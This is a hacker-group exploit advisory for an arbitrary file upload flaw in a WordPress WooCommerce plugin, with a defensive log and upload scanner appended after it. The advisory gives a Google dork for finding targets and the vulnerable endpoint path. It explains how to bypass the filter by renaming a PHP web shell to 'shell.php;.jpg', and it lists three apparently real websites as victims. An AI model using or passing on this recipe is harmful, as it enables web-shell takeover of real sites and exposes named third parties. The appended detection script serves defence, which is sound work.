WordPress Product Options for WooCommerce Plugin File Upload

2016.04.11
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

|[+] Exploit Title: WordPress Product Options for WooCommerce Plugin File Upload
|[+]
|[+] Exploit Author: M4ni4c
|[+]
|[+] Team Name: Azerbaijan Cyber Army
|[+]
|[+] Official Website: http://az-cyber.org/
|[+]
|[+] Software Link: http://codecanyon.net/item/product-options-for-woocommerce-wp-plugin/7973927
|[+]
|[+] Google Dork: inurl:/woocommerce-product-options/includes/
|[+]
|[+] Date: 11.04.2016
|[+]
|--------------------------------------------------------------|
|[+] Exploit: VICTIM/wp-content/plugins/woocommerce-product-options/includes/image-upload.php
|[+]
|[+] Description: Change your shell's extension "shell.php" to "shell.php;.jpg" and upload your shell
|[+]
|[+] Your files are uploaded to VICTIM/wp-content/uploads/filename
|[+]
|[+] OR
|[+]
|[+] VICTIM/wp-content/[year]/[month]/filename
|[+]
|[+] Examples:
|[+]
|[+] http://www.detasselingppe.com/wp-content/plugins/woocommerce-product-options/includes/image-upload.php
|[+]
|[+] http://medindex.am/wp-content/plugins/woocommerce-product-options/includes/image-upload.php
|[+]
|[+] http://www.bo3generacion.es/wp-content/plugins/woocommerce-product-options/includes/image-upload.php
|[+]
|[+] Karabakh is ours, and it will be ours
|[+]
|[+] Thanks: KroNiqs, Niko, Riko, Dado, Sprited
|[+] And Thanks My Friends: F3D4I & AlpArslan Beyy
|[+] Special Thanks: CXSECURITY.COM Team's Members
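
For site owners checking whether this endpoint has been used against them, the following is an added example, not part of the original advisory or the plugin's code: it flags upload file names that carry an executable extension in any segment (the "shell.php;.jpg" pattern described above) and lists POST requests to the advisory's image-upload.php path in an access log. The extension list, the function names, the combined log format and all sample data are assumptions constructed for illustration.

```python
import re
from pathlib import PurePosixPath

# Extensions a PHP-enabled server may hand to the interpreter (assumed list;
# align it with the handler mappings in your own web server config).
EXEC_EXTS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "pht"}
# Upload endpoint named in the advisory.
ENDPOINT = "/wp-content/plugins/woocommerce-product-options/includes/image-upload.php"
# Common/combined access log prefix: ip, ident, user, [time], "METHOD URL PROTO", status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

def is_suspicious_name(filename):
    """True if ANY extension-like segment is executable, not only the last one."""
    segments = re.split(r"[.;]+", filename.lower())[1:]  # drop the base name
    return any(seg.strip() in EXEC_EXTS for seg in segments)

def scan_uploads(paths):
    """Return the paths whose file name carries an executable segment."""
    return [p for p in paths if is_suspicious_name(PurePosixPath(p).name)]

def scan_access_log(lines):
    """Return (client_ip, status) for every POST to the upload endpoint."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, method, url, status = m.groups()
        if method == "POST" and url.split("?", 1)[0].endswith(ENDPOINT):
            hits.append((ip, int(status)))
    return hits

# Constructed sample data (documentation IP ranges, made-up file names).
SAMPLE_UPLOADS = [
    "wp-content/uploads/shell.php;.jpg",
    "wp-content/uploads/2016/04/product-photo.jpg",
    "wp-content/uploads/2016/04/banner.PHTML.png",
    "wp-content/uploads/my.phpinfo-notes.jpg",
]
SAMPLE_LOG = [
    '203.0.113.7 - - [11/Apr/2016:10:02:11 +0000] "POST /wp-content/plugins/woocommerce-product-options/includes/image-upload.php HTTP/1.1" 200 512',
    '198.51.100.4 - - [11/Apr/2016:10:03:40 +0000] "GET /shop/ HTTP/1.1" 200 18344',
    '203.0.113.7 - - [11/Apr/2016:10:02:30 +0000] "GET /wp-content/uploads/shell.php;.jpg HTTP/1.1" 200 31',
]

if __name__ == "__main__":
    print(scan_uploads(SAMPLE_UPLOADS))
    print(scan_access_log(SAMPLE_LOG))
```

Feed `scan_uploads` a recursive listing of the two upload locations the advisory names, and treat any hit as a file to quarantine and inspect rather than as proof of compromise.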



Copyright 2017, cxsecurity.com

 
